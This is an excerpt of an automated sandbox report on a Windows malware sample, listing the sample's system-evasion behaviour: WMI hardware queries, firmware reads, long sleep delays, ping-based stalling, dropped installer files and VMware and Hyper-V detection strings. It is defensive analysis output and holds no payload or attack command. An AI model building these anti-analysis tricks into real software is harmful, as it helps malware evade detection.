          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhostJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeMemory allocated: 2DD722C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeMemory allocated: 2DD73DC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1A950000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199359Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199249Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199139Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWindow / User API: threadDelayed 7640Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWindow / User API: threadDelayed 2179Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWindow / User API: foregroundWindowGot 1751Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 9654Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3533
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6219
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1942
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8574
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8288
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_shfoldr.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-T07R8.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-H1DAG.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe TID: 5832Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe TID: 708Thread sleep time: -22136092888451448s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 5792Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 5792Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -26747778906878833s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59875s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59766s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59656s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59547s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59437s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59326s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59218s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59109s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59000s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58891s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58766s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58641s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58531s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58422s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58312s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58203s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -58094s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57985s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57875s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57766s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57641s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57516s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57406s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57296s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57188s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -57063s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -56938s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -56828s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -56719s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -56594s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -56485s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 5792Thread sleep time: -360000s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59889s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59781s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59672s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59562s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59453s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59344s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59234s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -1199359s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -1199249s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -1199139s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59876s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 3284Thread sleep time: -59751s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 3533 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 6219 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 7552 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 1942 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep count: 8574 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912Thread sleep count: 616 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep count: 8288 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59875Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59766Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59656Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59547Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59437Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59326Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59218Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59109Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58891Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58766Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58641Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58531Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58422Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58312Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58203Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58094Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57985Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57875Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57766Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57641Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57516Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57406Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57296Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57188Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57063Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56938Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56828Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56719Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56594Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 56485Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59889Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59781Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59672Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59562Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59453Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59344Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59234Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199359Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199249Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199139Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59876Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59751Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: Stamp_Setup.tmp, 0000000A.00000002.2223623641.00000000005EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yur
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1654868087.000002DD74574000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1830638357.000002DD74555000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1655643471.000002DD74575000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1655864038.000002DD74575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
